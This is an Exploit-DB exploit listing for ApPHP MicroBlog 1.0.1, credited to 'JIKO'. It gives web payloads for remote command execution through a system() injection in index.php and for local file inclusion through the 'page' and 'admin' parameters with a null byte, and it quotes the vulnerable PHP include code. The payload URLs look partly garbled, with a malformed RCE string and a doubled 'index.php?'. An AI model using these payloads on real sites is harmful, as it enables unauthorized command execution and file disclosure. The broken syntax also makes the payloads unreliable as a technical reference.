EXPLOITS

ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities

Author: JIKO
type: webapps
platform: php
port: 
date_added: 2014-04-26  
date_updated: 2014-04-26  
verified: 1  
codes: OSVDB-106352;OSVDB-106351  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt33500/screen-shot-2014-04-26-at-112922.png  
application_url: http://www.exploit-db.comphp_microblog_101.zip  

raw file: 33030.txt  

----------[exploit Debut]
[Multiple Vulnerability]
----------[Script Info]

Moi : JIKO
Site    : No-exploit.Com


----------[Script Info]

Site        : http://www.apphp.com
Download    : http://www.apphp.com/downloads_free/php_microblog_101.zip

----------[exploit Info]

~[RCE]
http://path/index.php?jiko);system((dir)=/
~[LFI]
http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter)
http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter)

if (($page != "") && file_exists("page/" . $page . ".php")) {
                        include_once("page/" . $page .

".php");
                    } else if (($admin != "") &&

file_exists("admin/" . $admin . ".php")) {
                        include_once("admin/" . $admin

. ".php");
                    }
----------[exploit Fin]